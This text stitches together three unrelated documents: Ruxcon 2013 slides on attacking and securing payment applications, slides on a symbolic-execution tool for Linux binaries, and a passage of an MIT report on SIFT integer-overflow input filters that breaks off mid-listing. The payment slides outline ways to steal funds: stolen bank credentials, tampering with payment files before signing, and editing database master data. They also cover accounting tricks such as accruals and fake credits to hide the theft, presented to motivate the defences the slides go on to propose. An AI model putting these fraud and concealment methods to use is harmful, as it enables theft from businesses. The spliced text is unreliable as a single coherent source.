Payment Applications Handle Lots of 
Money
No, Really, Lots of it!!
Alberto Revelli (icesurfer)
icesurfer@gmail.com
Ruxcon 2013Mark Swift (swifty)
swifty@swift.org
Ruxcon 2013 2Agenda
✔Introduction to payment applications
✔Avenues of attack
✔Cryptocomedy
✔How to fix this?
✔Key takeaways
Ruxcon 2013This is an area badly understood and apparently 
overlooked by the security industry (except, it 
appears, by clueless morons).
The ultimate people who have to be convinced about 
security care about one thing.  Money.  It’s that 
simple. 
Twilight zone / Reversing the natural order of things.
•Swifty will do Attack & The Dummy’s guide to 
payments
•Ice will do Defence Context
Ruxcon 2013Front Office 
Trade Recs
Accountin
g
Payment 
GatewayBusiness Management / Capture.  Not 
interesting.
Mess with these areas and you can hide 
FO/Ops misbehaviour for ages. Serious 
scope of mischief here if direct settlements 
made from here.
P&L (profit and loss), actuals 
reconciliation, funky accounting methods 
to reduce tax.
Some kind of ‘payment gateway’.  Either 
manual, direct banking interface (‘EFT’ - 
horribly insecure), or FIDES/SWIFT.Master Data
PO / 
Settlements
Bank / 
BureauxHard.  Leave these guys alone or you 
will get an extradition warrant for a 
Christmas present.Landscape
Ruxcon 2013• Seeing the wood for the trees
•Massive payments and recs volumes
•Acceptable error margins.
•Human nature: find the explanation you are looking for.
•End of months reconciliations don’t (‘accruals’)
• Accounts are indecipherable: reversals, accruals, depreciation, loans, amortizations, 
and other dodges accounting techniques.
•Computers are never wrong
• Who ever does a manual reconciliation check?
•Auditors don’t audit
• Accountants and auditors look at processes, procedures, and evidenced accounts. 
•Security by buzzword.  Crypt is magic that fixes everything.
•Q: How do you secure payments?
•A: We use military grade FIPS certified AES crypto and D/H to verify integrity.  We 
are fully PCI complaint. The Opportunity
Ruxcon 2013Accountin
g
Payment 
GatewayMessage Bus
1)Direct settlements : often broadcast 
messages (sometimes signed).
GUI
2) Often no 2FA for left/right hand operators.  
3) Master data not secured? Create a new 
counterparty 
Server
3) Payment / recs files written out to ‘secure 
fileshares’.
4) Private key lying around(if it even exists).
6) Cannot mess  via the GUI? Go direct to the 
database.  
7) Plaintext memory attacks if you really have 
to.Server 
8) Signing and crypto may happen here. 
Direct attacks on payment files possible prior 
to signing.
9) Private key probably ripe for attack, so 
direct attacks on payment files post signing 
also possibly.SettlementsTrade RecsLandscape Issues
Ruxcon 2013MT940  - Statement - relevant  
lines
:61:120706D1343280,2NMSCBCP .LEA 
36175AFB//4612-0000000 
:86:BCP.LEA 36175AFB 
:62F:C120709USD9542201,3MT101 – Payment 
File 
{- 
FIDES 
ABNAMROXX99 
101 02 
:30:120622 
:21: 36175AFB 
:32B:USD1343280,25 
:50H:/10944563 
Sucker Co LTD
London
:57D: Lloyds Bank PLC 
Moosley Street 
Manchester 
LOYDGB21N78/GB/771935 
:59:/897766
Security Services 
London
:70:023-0000254 
:71A:OUR 
-} Amount and 
Currency
a/c and namePay to this 
bankUnique Ref
Closing BalanceShow.Me.The.Money
Ruxcon 2013
December 2012 UNCON 21Payment file processing
The server process producing the payment file can be processed via a specific server queue. If needed per client and per process it is possible to setup a specific 
server queue.  The files are automatically stored in a predefined subfolder as defined per 
the server queue. User access to this folder should be limited to prevent users to access and update the output 
files.
 
Besides the payment file a report (Bank list) is produced containing the total amount per currency, the number of transactions and a total sum bank account . The 
sum bank account is an example of a hash total which can be used to 
check the integrity of the data . When the payment file is imported in the banking software the same hash total is shown .
Transport of payment file
The transport of the payment file from the Account system subfolder to 
the banking software, can be based on regular file 
transfer, or via FTP or SFTP . In case of 
in-house banking software the file is often 
directly read from the Account 
subfolder. In case of external banking software FTP or SFTP . 
SFTP is advised.Straight from the Manual....
Ruxcon 2013Generate and Send Payments 
(MT101)
 
Encrypt Payment Files
echo %Password%|gpg --encrypt --batch --passphrase-fd 0 
--sign --output 
"C:\FTP\IT2\Working\delivery.txt.asc " 
--recipient "Fides Treasury Services Ltd (FTP Channels)" 
"C:\FTP\IT\Outgoing\*.*"
Upload Payment Files
FTP -s:C:\Scripts\FidesITUpload.txt
**Contents of FidesITUpload.txt**
open xxx.xx.xx.xx
[removed password]
%Password%cd /EFT/In
binhashput C:\FTP\IT\Working\*.ascbye
 
Copy Payment Files
Cmd.exe /C Move /y C:\FTP\IT\Outgoing\*.* C:\FTP\IT\CompleteDownloads Statements (MT940)
FTP -i -s:C:\Scripts\FidesITDownload.txt
**Contents of FidesITDownload.txt**
open xxx.xx.xx.xx
[removed password]
%Password%
cd /ARS
bin
hashmget *.asc C:\FTP\IT\Incoming\*
bye
 
Decrypt Statements
echo %Password%[|gpg --batch 
--passphrase-fd 0 --decrypt-files *.ASC
 
Copies Statements to the Application 
Server
Move /y *.txt "\\server.xxx.com\IT\Statements"Process Outside T1 Bank
Ruxcon 2013 10Agenda
✔Introduction to payment applications
✔Avenues of attack
✔Cryptocomedy
✔How to fix this?
✔Key takeaways
Ruxcon 2013 Payment File / System attacks
• Manual payments:  Steal the bank creds and transfer cash.  Recs 
avoidance more difficult.
• Direct Bank Interface: as above, or mess with the payment file and then 
‘correct’ the reconciliation statement.  
• FIDES/SWIFT: as above, just grab it before it gets encrypted/signed / 
after decryption/verification.Theft and Avoidance - Basic
Ruxcon 2013• Attacks via the GUI
• 2nd Hand Fraud:  Steal the authentication for left/right hand officers and 
set up payments via the system.  Made more difficult by 2FA.
•Change customer payment details (IBAN etc). Change back later.  
Suppression of reconciliation difficult.
•Internal collusion: tried and tested method.  
• Other
•Direct changes to the database – master data (counterparty details, 
maybe payment amounts etc).
• External partners in fraud: ‘evil hackers’ break in and change the 
payment amounts and suppress breaks.
•Note:  operator accuracy reports – is it just management who is checking on the 
most incompetent operators?Theft and Avoidance – Less Basic
Ruxcon 2013•So stealing money turns out to be a lot easier than imagined.  Hiding your 
tracks long term requires a different skill set ... 
• Channel your inner accountant (some examples):
•Accruals – “we’ll work it out next month”
•Reversals – “don’t worry, the money came back”
•Depreciation – to adjust balances and hide cash out.
•Amortization – “well spread it over a few years”
•Loans (3rd party & intercompany).  The ‘Starbucks’ approach.
•Credits (3rd party & intercompany). Balance down $1m?  Easy, make up 
a credit from somewhere else!
•Interest rates:  increase them and move surplus cash
•Exchange Rates:  change them and move surplus cash
oComputers have been around for 150 years.  Accountants have been 
around for thousands.  Theft and Avoidance – Elite

Ruxcon 2013
•Accounting tricks to hide cash-
out still work
•Database:  how is payment and 
counterparty data stored prior to 
payment generation?
•How is the backend/ERP system 
(payment instructions) secured?
•GUI based master data attacks 
should still work.
•On positive side GUI payments 
attacks now difficult due to 2FA.
More about the crypto management 
process later ... A Secured Process – T1 Bank
Ruxcon 2013 15Agenda
✔Introduction to payment applications
✔Avenues of attack
✔Cryptocomedy
✔How to fix this?
✔Key takeaways
Ruxcon 2013
Key Management? What’s that?
Ruxcon 2013Hashing? Yes, We Do Hash
1. Multiply each account number for the 
respective amount
2. Sum all results
3. T ake up to the 22 most significant digitsFinance Systems Specialist: 
It is easy to add to the current flat file produced from SAP a 
hash total. We do it most of the time for bank transfer files. It is 
difficult to crack a hash total solution.
Ruxcon 2013Encryption? Yes, That too!
1. Generate a very long key
2. For each payment line x, we calculate (key 
+ x)
3. We then <insert clumsy description of Vigenère 
cipher* here>” Finance Systems Specialist: 
“Sure we encrypt the payment information! Here’s 
what we do....”
* Published in 1553 and considered unbreakable.  Publicly broken by Charles 
Babbage in 1854. 
Ruxcon 2013 19Agenda
✔Introduction to payment applications
✔Avenues of attack
✔Cryptocomedy
✔How to fix this?
✔A few caveats
✔Key takeaways
Ruxcon 2013Accounting
Payment 
GatewaySettlementsTrade RecsWe focus on this bit, because:
 
- Here is where there is the opportunity to 
make arbitrary payments
- Opportunity to cover the traces of those 
payments
 
- Before this step any settlement request 
has to be against an existing counterparty 
pre-set up in the system
So, let’s fix this sucker
Ruxcon 2013•User A creates the payment instruction
•User B approves it
•User C releases it
•Finally, User D finalizes it into a MT101 file
“Hey, four people need to control this, what could possibly 
go wrong?”A real example of this process
Ruxcon 2013Payments are NOT immutable artifacts
•When a user creates or approves a payment, all he does is 
writing some rows in a DB
“DBAs do not understand commodities markets”
not a good defense strategy
Ruxcon 2013Really, they are NOT!
In most cases, once the MT101 is created it is stored as a 
text file in a (shared) folder waiting for Dude E to encrypt it for 
transmission
What could possibly go wrong?
Ruxcon 2013Basic, Obvious Idea: Sign each Step 
User A creates the payment....
...Payment is signed with his private key
User B approves it....
...Check first signature, then re-sign
User C re-approves it
...Check both previous signatures, then re-sign
You got the idea...You got the idea...
Ruxcon 2013Just add a few columns, right?
 
 <Other payment columns> UserIDSignatureUserIDSignatureUserIDSignature
Payment
details“Creator” “First 
Approver”“Second 
Approver”Payment Proposal
Ruxcon 2013    MT101
Bank
GeneralInfo
Name
Recipient
TransactionDetails MT101Info
AccountServicingInstitution
Authorisation
InstructionParty
MessageIndexingTotal
RequestedExecutionDate
...OrderingCustomer
...
 AccountWithInstitution
Beneficiary
ChargesAccount
CurrencyTransactionAmount
...MT101TransactionDetailEach of these rows 
can be signed by a 
different combo of 
peopleOk, It’s a bit more Complicated
Ruxcon 2013 MT101
 MT101Info MT101TransactionDetails
 MT101TransactionDetails  Signature Signature
 MT101TransactionDetails  SignatureComplicated, and somewhat Overlapping
Ruxcon 2013 HSM (Calgary)  HSM (London)  HSM (Singapore) Web Service Crypto Web ServiceActive Directory
RSA
HSM SubnetvShieldPayment App DBMSWho Will Sign Anyway?
Ruxcon 2013•A Hardware Security Module (FIPS140-2)
•Intrusion-resistant, tamper-evident hardware
•Keys in hardware
•PKCS#11, Microsoft CAPI, CNG ,JCA/JCE, OpenSSL
•PRNG, symmetric and asymmetric key pair generation, 
encryption, decryption, digital signingAbout the HSM guys...
Ruxcon 2013
•Remote login with USB token and 
PIN
•Tamper-proof
•Buttons are spaced for users who 
are likely to wear gloves
•E.g.: soldiers in tanksPlaying with HSMs is fun!
Ruxcon 2013 HSM Crypto Web Service
Active Directory
Creators
Approvers
FinalizersPayment
App
Payment 
ServiceAdmin
 App
Admins
Payment
signing Key – User association
AD AdminsGroup – User association
HSM Admins
HSM Partition
ManagementDBMSTwo Apps and Lots of Groups
Ruxcon 2013 Authentication Data (AD, RSA)
<?xml version="1.0" encoding="UTF-16" standalone="no"?><PaymentRequest>
<TransactionReference>PIL-12041210000     </TransactionReference>
<PostingDate>27.03.12</PostingDate><Provider>Fides</Provider><RequestedExecutionDate>27.03.12</RequestedExecutionDate>
<InstructingParty/><Ammount>150</Ammount>
<Currency>USD</Currency>
<Intermediary/><AccountWithIstitution>CRESCHZZ80A</AccountWithIstitution><Reason>\\\</Reason>
<DetailsOfCharges>Share</DetailsOfCharges><OrderingCustomer>
<BIC>CRESCHZZ80A</BIC><IBAN>CH05 0483 5143 0870 9100 0</IBAN><BankAccount>143080-91</BankAccount><Name>Big Co, Inc.</Name>
<Address>PO Box 30</Address><CountryCode>CH</CountryCode><PostCode>CH-1101</PostCode><City>Bienne/Biel</City></OrderingCustomer><Beneficiary>
<IBAN>CRESCHZZ80A</IBAN><BankAccount>1430870-91</BankAccount><Name>CREDSUISS CHF A/C1430870-91   </Name><Address>1+ 7 Quai des Bergues </Address><CountryCode/>
<PostCode>1211</PostCode><City>Geneva</City></Beneficiary>
<Payment><LineNo>10000</LineNo><Amount>100</Ammount>
</Payment></PaymentRequest>Sign this, B*tch!
Ruxcon 2013 HSM (Calgary)  HSM (London)  HSM (Singapore) Web Service Crypto Web ServiceActive Directory
RSA
HSM SubnetvShieldPayment App DBMS
XMLSign1Step 1: Payment Creation
Ruxcon 2013 HSM (Calgary)  HSM (London)  HSM (Singapore) Web Service Crypto Web ServiceActive Directory
RSA
HSM SubnetvShieldPayment App DBMS
Sign2Step 2: First Approval
XML
Sign1
Ruxcon 2013 HSM (Calgary)  HSM (London)  HSM (Singapore) Web Service Crypto Web ServiceActive Directory
RSA
HSM SubnetvShieldPayment App DBMSStep 3: Second Approval
XML
Sign3
Sign1
Sign2
Ruxcon 2013 HSM (Calgary)  HSM (London)  HSM (Singapore) Web Service Crypto Web ServiceActive Directory
RSA
HSM SubnetvShieldPayment App DBMSStep 4: Finalization
XML
MT101Sign1
Sign2
Sign3
Payer's
SignatureEncr(FIDES)
Ruxcon 2013WOW! This Might Work!
•DBAs cannot modify payment data
•File is protected at the moment of creation
•Adding yourself to an AD Group is not enough: you also 
need to have a CryptoService admin to generate your key
•Job done?
Ruxcon 2013 HSM (Calgary)  HSM (London)  HSM (Singapore) Web Service Crypto Web ServiceActive Directory
RSA
HSM SubnetvShieldPayment App DBMSIt is Easy to Get Things Wrong
XML
MT101Sign1
Sign2
Sign3
Payer's
SignatureEncr(FIDES)
Ruxcon 2013 HSM (Calgary)  HSM (London)  HSM (Singapore) Web Service Crypto Web ServiceActive Directory
RSA
HSM SubnetvShieldPayment App DBMS......Oooops!
XML
MT101 != XML
:))))Sign1
Sign2
Sign3
Payer's
SignatureEncr(FIDES)
Ruxcon 2013Quis Custodiet Ipsos Custodes?*
1) Wait for the payment finalization request
2) Check the signatures (we don't want others to cheat at the same 
time)
3) Change the payment beneficiary
4) Sign+encrypt
5) PROFIT!!!
 * Who watches the watchmen?
Ruxcon 2013 HSM (Calgary)  HSM (London)  HSM (Singapore) Web Service Crypto Web ServiceActive Directory
RSA
HSM SubnetvShieldPayment AppPhase 4: Corrected
XML
Sign1
Sign2
Sign3Payer's
SignatureMT101
Payer's
SignatureEncr(FIDES)
Ruxcon 20131) The application submits the XML
2) The CS verifies the signatures
3) The CS generates a MT101 and signs it
4) The CS returns the signature
5) The application generates another MT101 and verifies that the 
signature corresponds
6) The application calls GPG with the following parameters:
  - The MT101
  - The signature
  - The recipient's public key
7) The resulting file is finally sentDual Control! Always!
Ruxcon 2013 43Agenda
✔Introduction to payment applications
✔Avenues of attack
✔Cryptocomedy
✔How to fix this?
✔Key takeaways
Ruxcon 2013A Few Takeaways
1) Payments app are everywhere and handle big bucks, but they 
are generally “secured” by clueless people
2) Financial system vendors seem to be utterly clueless about this
3) Most payment apps out there are likely to be horribly vulnerable
4) Why don't we hear about the thefts?
Ruxcon 2013More Takeaways
5) It can be a funny problem to solve!
6) There obviously was a whole bunch of other intricacies, but 
you get the main idea
7) The devil is in the details
Ruxcon 2013Questions?Symbolic Execution 
of Linux binaries 
A tool for the 
About Symbolic Execution 
●Dynamically explore all program branches. 
●Inputs are considered symbolic variables. 
●Symbols remain uninstantiated and become 
constrained at execution time. 
●At a conditional branch operating on 
symbolic terms, the execution is forked. 
●Each feasible branch is taken, and the 
appropriate constraints logged. 

Input space >> Number of paths 
int main( ) { 
        int val;
        read(STDIN, & val, sizeof( val) ); 
        if ( val > 0 ) 
               if ( val < 100 ) 
      do_something( ); 
        else 
             do_something_else( ); 
}


This is used for: 
●Test generation and bug hunting. 
●Reason about reachability. 
●Worst-Case Execution Time Analysis. 
●Comparing different versions of a func. 
●Deobfuscation, malware analisys. 
●AEG: Automatic Exploit Generation. Whaat?! 

State of the art 
●Lots of academic papers: 
○2008-12-OSDI-KLEE 
○Unleashing MAYHEM on Binary 
●Several implementations: 
○SymDroid, Cloud9, Pex, jCUTE, Java PathFinder, 
KLEE, s2e, fuzzball, mayhem, cbass 
●Only a few work on binary : 
○libVEX / IL based 
○quemu based 
Our aim 
●Emulate Intel IA64 machine code symbolically. 
●Load ELF executables. 
●Synthesize any process state as starting point. 
●The final code should be readable and easy to 
extend. 
●Use as few dependencies as possible: 
○ pyelftools, distorm3  and z3
●Analysis state can be saved and restored. 
●Workload can be distributed (dispy )

Basic architecture 

Instructions Frequency in GNU LIBC 
●336 different opcodes 
●160218 total instructions 
●37% of them are MOV or ADD 
●currently 185 instruction 
implemented 
CPU 
● Based on distorm3 DecomposeInterface. 
● Most instructions are very simple, ex. 
      @instruction 
    def DEC(cpu, dest): 
           res = dest.write( dest.read() - 1 ) 
           #Affected Flags o..szapc 
           cpu.calculateFlags('DEC', dest.size, res) 

Memory 
class Memory: 
    def mprotect(self, start, size, perms): ... 
    def munmap(self, start, size): ... 
    def mmap(self, addr, size, perms): ... 
    def putchar(self, addr, data): ... 
    def getchar(self, addr): ... 

Operating System Model (Linux) 
class Linux: 
   def exe(self, filename, argv=[], envp=[]):... 
   def syscall(self, cpu):... 
   def sys_open(self, cpu, buf, flags, mode):... 
def sys_read(self, cpu, fd, buf, count):...    
def sys_write(self, cpu, fd, buf, size):... 
   def sys_close(self, cpu, fd):... 
   def sys_brk(self, cpu, brk):... 

Symbols and SMT solver 
class Solver: 
    def getallvalues(self, x, maxcnt = 30): 
    def minmax(self, x, iters=10000): 
    def check(self): 
    def add(self, constraint): 
#Symbols factory 
    def mkArray(self, size, name ): ...
    def mkBool(self, name ): ...
    def mkBitVec(self, size, name ): ...

Operation over symbols is almost 
transparent 
>>> from smtlibv2 import * 
>>> s = Solver() 
>>> a = s.mkBitVec(32) 
>>> b = s.mkBitVec(32) 
>>> s.add( a + 2*b > 100 )
>>> s.check()           
'sat' 
>>> s.getvalue(a), s.getvalue(b) 
(101, 0)

The glue: Basic Initialization 
1.Make Solver, Memory, Cpu and Linux 
objects. 
2.Load ELF binary program in Memory,  
Initialize cpu registers, initialize stack. 
solver = Solver() 
mem = SMemory(solver, bits, 12 ) 
cpu = Cpu(mem, arch ) 
linux = SLinux(solver, [cpu], mem, ... ) 
linux.exe(“./my_test”, argv=[], env=[]) 

The glue: Basic analysis loop 
states = [‘init.pkl’] 
while len(states) > 0 : 
linux = load(state.pop()) 
while linux.running: 
linux.execute() 
if isinstance( linux.cpu.PC, Symbol): 
vals = solver.getallvalues(linux.
cpu.PC) 
-- generate states for each value -- 
break 
Micro demo 
python system.py -h 
usage: system.py [-h] [-sym SYM] [-stdin STDIN] 
[-stdout STDOUT] 
                 [-stderr STDERR] [-env ENV] 
                 PROGRAM ... 
python system.py -sym stdin  my_prog 
  stdin: 
     PDF-1.2++++++++++++++++++++++++++++++ 
Symbolic inputs. 
We need to mark whic part of the environment 
is symbolic: 
●STDIN: a file partially symbolic. Symbols 
marked with “+” 
●STDOUT and STDERR are placeholders. 
●ARGV and ENVP can be symbolic 
A toy example 
int main(int argc, char* argv[], char* envp[]){ 
    char buffer [0x100] = {0}; 
    read(0, buffer , 0x100); 
    if (strcmp( buffer , "ZARAZA") == 0 ) 
        printf("Message: ZARAZA!\n"); 
    else 
        printf("Message: Not Found!\n"); 
return 0; 
}

Conclusions, future work 
●Push all known optimizations: solver cache, 
implied values, Redundant State Elimination, 
constraint independence, KLEE-like cex 
cache, symbol simplification. 
●Add more cpu instructions (fpu, simd). 
●Improve Linux model, add network. 
●Implement OSX loader and os model. 
●https://github.com/feliam/pysymemu 
gGracias. 
 Contacto: 
        feliam@binamuse.com 
Computer Scienc e and A rtifi cialIntelli genc e Labor atory
Techn ical Report
mas sachus etts ins titute of technology , cambr idge, ma 0 213 9 usa — www .csai l.m it.eduMIT-CSAIL-TR-2013-018 August 6, 2013
Sound Input Filter Generation for Integer 
Overflow Errors
Fan Long, Stelios Sidiroglou-Douskos, Deokhwan 
Kim, and Martin Rinard
Sound Input Filter Generation for Integer Overflow Errors
Fan Long, Stelios Sidiroglou-Douskos, Deokhwan Kim, Martin Rinard
MIT CSAIL
{fanl, stelios, dkim, rinard}@csail.mit.edu
Abstract
We present a system, SIFT, for generating input filters that
nullify integer overflow errors associated with critical pro-
gram sites such as memory allocation or block copy sites.
SIFT uses a static program analysis to generate filters that
discard inputs that may trigger integer overflow errors in the
computations of the sizes of allocated memory blocks or the
number of copied bytes in block copy operations. The gen-
erated filters are sound — if an input passes the filter, it will
not trigger an integer overflow error for any analyzed site.
Our results show that SIFT successfully analyzes (and
therefore generates sound input filters for) 52 out of 58 mem-
ory allocation and block memory copy sites in analyzed in-
put processing modules from five applications (VLC, Dillo,
Swfdec, Swftools, and GIMP). These nullified errors include
six known integer overflow vulnerabilities. Our results also
show that applying these filters to 62895 real-world inputs
produces no false positives. The analysis and filter genera-
tion times are all less than a second.
1. Introduction
Many security exploits target software errors in deployed
applications. One approach to nullifying vulnerabilities is to
deploy input filters that discard inputs that may trigger the
errors.
We present a new static analysis technique and imple-
mented system, SIFT, for automatically generating filters
that discard inputs that may trigger integer overflow errors
at analyzed memory allocation and block copy sites. We fo-
cus on this problem, in part, because of its practical impor-
tance. Because integer overflows may enable code injection
or other attacks, they are an important source of security vul-
nerabilities [22, 29, 32].
Unlike all previous techniques of which we are aware,
SIFT is sound — if an input passes the filter, it will not
trigger an overflow error at any analyzed site.
1.1 Previous Filter Generation Systems
Standard filter generation systems start with an input that
triggers an error [8–10, 24, 33]. They next use the input to
generate an execution trace and discover the path the pro-gram takes to the error. They then use a forward symbolic
execution on the discovered path (and, in some cases, heuris-
tically related paths) to derive a vulnerability signature — a
boolean condition that the input must satisfy to follow the
same execution path through the program to trigger the same
error. The generated filter discards inputs that satisfy the vul-
nerability signature. Because other unconsidered paths to the
error may exist, these techniques are unsound (i.e., the filter
may miss inputs that exploit the error).
It is also possible to start with a potentially vulnerable site
and use a weakest precondition analysis to obtain an input
filter for that site. To our knowledge, the only previous tech-
nique that uses this approach [4] is unsound in that 1) it uses
loop unrolling to eliminate loops and therefore analyzes only
a subset of the possible execution paths and 2) it does not
specify a technique for dealing with potentially aliased val-
ues. As is standard, the generated filter incorporates checks
from conditional statements along the analyzed execution
paths. The goal is to avoid filtering potentially problematic
inputs that the program would (because of safety checks at
conditionals along the execution path) process correctly. As
a result, the generated input filters perform a substantial (be-
tween 106and1010) number of operations.
1.2 SIFT
SIFT starts with a set of critical expressions from memory
allocation and block copy sites. These expressions control
the sizes of allocated or copied memory blocks at these
sites. SIFT then uses an interprocedural, demand-driven,
weakest precondition static analysis to propagate the critical
expression backwards against the control flow. The result
is a symbolic condition that captures all expressions that
the application may evaluate (in any execution) to obtain
the values of critical expressions. The free variables in the
symbolic condition represent the values of input fields. In
effect, the symbolic condition captures all of the possible
computations that the program may perform on the input
fields to obtain the values of critical expressions. Given an
input, the generated input filter evaluates this condition over
the corresponding input fields to discard inputs that may
cause an overflow.
1 2013/8/5
AnnotatedModulesStatic AnalysisSymbolicConditionsCritical SiteIdentificationFilter Generator
Drop Input?Incoming Input
ApplicationNoYes
Generate Report Property CheckerFigure 1. The SIFT architecture.
A key challenge is that, to successfully extract effec-
tive symbolic conditions, the analysis must reason precisely
about interprocedural computations that use pointers to com-
pute and manipulate values derived from input fields. Our
analysis meets this challenge by deploying a novel combi-
nation of techniques including 1) a novel interprocedural
weakest precondition analysis that works with symbolic rep-
resentations of input fields and values accessed via pointers
(including input fields read in loops and values accessed via
pointers in loops) and 2) an alias analysis that ensures that
the derived symbolic condition correctly characterizes the
values that the program computes.
Another key challenge is obtaining loop invariants that
enable the analysis to precisely characterize how loops
transform the propagated symbolic conditions. Our analy-
sis meets this challenge with a novel symbolic expression
normalization algorithm that enables the fixed point analysis
to terminate unless it attempts to compute a symbolic value
that depends on a statically unbounded number of values
computed in different loop iterations (see Section 3.2).
•Sound Filters: Because SIFT takes all paths to analyzed
memory allocation and block copy sites into account, it
generates sound filters — if an input passes the filter, it
will not trigger an overflow in the evaluation of any crit-
ical expression (including the evaluation of intermediate
expressions at distant program points that contribute to
the value of the critical expression).1
•Efficient Filters: Unlike standard techniques, SIFT in-
corporates no checks from the program’s conditional
statements and works only with arithmetic expressions
that contribute directly to the values of the critical ex-
1As is standard in the field, SIFT uses an alias analysis that is designed to
work with programs that do not access uninitialized or out of bounds mem-
ory. Our analysis therefore comes with the following soundness guarantee.
If an input passes the filter for a given critical expression e, the input field
annotations are correct (see Section 3.4), and the program has not yet ac-
cessed uninitialized or out of bounds memory when the program computes
a value of e, then no integer overflow occurs during the evaluation of e(in-
cluding the evaluations of intermediate expressions that contribute to the
final value of the critical expression).pressions. It therefore generates much more efficient fil-
ters than standard techniques (SIFT’s filters perform tens
of operations as opposed to tens of thousands or more).
Indeed, our experimental results show that, in contrast
to standard filters, SIFT’s filters spend essentially all of
their time reading the input (as opposed to checking if
the input may trigger an overflow error).
•Accurate Filters: Our experimental results show that,
empirically, ignoring execution path constraints results
in no loss of accuracy. Specifically, we tested our gener-
ated filters on 62895 real-world inputs for six benchmark
applications and found no false positives (incorrectly fil-
tered inputs that the program would have processed cor-
rectly). We attribute this potentially counterintuitive re-
sult to the fact that standard integer data types usually
contain enough bits to represent the memory allocation
sizes and block copy lengths that benign inputs typically
elicit.
1.3 SIFT Usage Model
Figure 1 presents the architecture of SIFT. The architecture
is designed to support the following usage model:
Module Identification. Starting with an application that is
designed to process inputs presented in one or more input
formats, the developer identifies the modules within the ap-
plication that process inputs of interest. SIFT will analyze
these modules to generate an input filter for the inputs that
these modules process.
Input Statement Annotation. The developer annotates the
relevant input statements in the source code of the modules
to identify the input field that each input statement reads.
Critical Site Identification. SIFT scans the modules to find
allcritical sites (currently, memory allocation and block
copy sites). Each critical site has a critical expression that
determines the size of the allocated or copied block of mem-
ory. The generated input filter will discard inputs that may
trigger an integer overflow error during the computation of
the value of the critical expression.
Static Analysis. For each critical expression, SIFT uses a
demand-driven backwards static program analysis to auto-
2 2013/8/5
matically derive the corresponding symbolic condition . Each
conjunct expression in this condition specifies, as a function
of the input fields, how the value of the critical expression is
computed along one of the program paths to the correspond-
ing critical site.
Input Parser Acquisition. The developer obtains (typically
from open-source repositories such as Hachoir [1]) a parser
for the desired input format. This parser groups the input bit
stream into input fields, then makes these fields available via
a standard API.
Filter Generation. SIFT uses the input parser and symbolic
conditions to automatically generate the input filter. When
presented with an input, the filter reads the fields of the input
and, for each symbolic expression in the conditions, deter-
mines if an integer overflow may occur when the expression
is evaluated. If so, the filter discards the input. Otherwise, it
passes the input along to the application. The generated fil-
ters can be deployed anywhere along the path from the input
source to the application that ultimately processes the input.
1.4 Experimental Results
We used SIFT to generate input filters for modules in
five real-world applications: VLC 0.8.6h (a network me-
dia player), Dillo 2.1 (a lightweight web browser), Swfdec
0.5.5 (a flash video player), Swftools 0.9.1 (SWF manipu-
lation and generation utilities), and GIMP 2.8.0 (an image
manipulation application). Together, the analyzed modules
contain 58 critical memory allocation and block copy sites.
SIFT successfully generated filters for 52 of these 58 crit-
ical sites (SIFT’s static analysis was unable to derive sym-
bolic conditions for the remaining six critical sites, see Sec-
tion 5.2 for more details). These applications contain six
integer overflow vulnerabilities at their critical sites. SIFT’s
filters nullify all of these vulnerabilities.
Analysis and Filter Generation Time. We configured SIFT
to analyze all critical sites in the analyzed modules, then gen-
erate a single, high-performance composite filter that checks
for integer overflow errors at all of the sites. The maximum
time required to analyze all of the sites and generate the com-
posite filter was less than a second for each benchmark ap-
plication.
False Positive Evaluation. We used a web crawler to obtain
a set of least 6000 real-world inputs for each application (for
a total of 62895 input files). We found no false positives —
the corresponding composite filters accept all of the input
files in this test set.
Filter Performance. We measured the composite filter exe-
cution time for each of the 62895 input files in our test set.
The average time required to read and filter each input was at
most 16 milliseconds, with this time dominated by the time
required to read in the input file.1.5 Contributions
This paper makes the following contributions:
•SIFT: We present SIFT, a sound filter generation sys-
tem for nullifying integer overflow vulnerabilities. SIFT
scans modules to find critical memory allocation and
block copy sites, statically analyzes the code to automat-
ically derive symbolic conditions that characterize how
the application may compute the sizes of the allocated
or copied memory blocks, and generates input filters that
discard inputs that may trigger integer overflow errors in
the evaluation of these expressions.
In comparison with previous filter generation techniques,
SIFT is sound and generates efficient and empirically
precise filters.
•Static Analysis: We present a new static analysis that au-
tomatically derives symbolic conditions that capture, as a
function of the input fields, how the integer values of crit-
ical expressions are computed along the various possible
execution paths to the corresponding critical site.
Key elements of this static analysis include 1) a precise
backwards symbolic analysis that soundly and accurately
reasons about symbolic conditions in the face of instruc-
tions that use pointers to load and store computed values
and 2) a novel normalization procedure that enables the
analysis to effectively synthesize symbolic loop invari-
ants.
•Experimental Results: We present experimental results
that illustrate the practical viability of our approach in
protecting applications against integer overflow vulnera-
bilities at memory allocation and block copy sites.
The remainder of the paper is organized as follows. Sec-
tion 2 presents an example that illustrates how SIFT works.
Section 3 presents the core SIFT static analysis for C pro-
grams. Section 4 presents the formalization of the static anal-
ysis and discusses the soundness of the analysis. Section 5
presents the experimental results. Section 6 presents related
work. We conclude in Section 7.
2. Example
We next present an example that illustrates how SIFT
nullifies an integer overflow vulnerability in Swfdec 0.5.5,
an open source shockwave flash player.
Figure 2 presents (simplified) source code from Swfdec.
When Swfdec opens an SWF file with embedded JPEG im-
ages, it calls jpeg_decoder_decode() (line 1 in Figure 2)
to decode each JPEG image in the file. This function in
turn calls the function jpeg_decoder_start_of_frame()
(line 7) to read the image metadata and the function
3 2013/8/5
1int jpeg_decoder_decode(JpegDecoder *dec) {
2 ...
3 jpeg_decoder_start_of_frame(dec, ...);
4 jpeg_decoder_init_decoder (dec);
5 ...
6}
7void jpeg_decoder_start_of_frame(JpegDecoder *dec){
8 ...
9 dec->height = jpeg_bits_get_u16_be (bits);
10 /*dec->height = SIFT_input("jpeg_height", 16); */
11 dec->width = jpeg_bits_get_u16_be (bits);
12 /*dec->width = SIFT_input("jpeg_width", 16); */
13 for (i = 0; i < dec->n_components; i++) {
14 dec->components[i].h_sample =getbits(bits, 4);
15 /*dec->components[i].h_sample =
16 SIFT_input("h_sample", 4); */
17 dec->components[i].v_sample =getbits(bits, 4);
18 /*dec->components[i].v_sample =
19 SIFT_input("v_sample", 4); */
20 }
21 }
22 void jpeg_decoder_init_decoder(JpegDecoder *dec){
23 int max_h_sample = 0;
24 int max_v_sample = 0;
25 int i;
26 for (i=0; i < dec->n_components; i++) {
27 max_h_sample = MAX(max_h_sample,
28 dec->components[i].h_sample);
29 max_v_sample = MAX(max_v_sample,
30 dec->components[i].v_sample);
31 }
32 dec->width_blocks=(dec->width+8 *max_h_sample-1)
33 / (8 *max_h_sample);
34 dec->height_blocks=(dec->height+8 *max_v_sample-1)
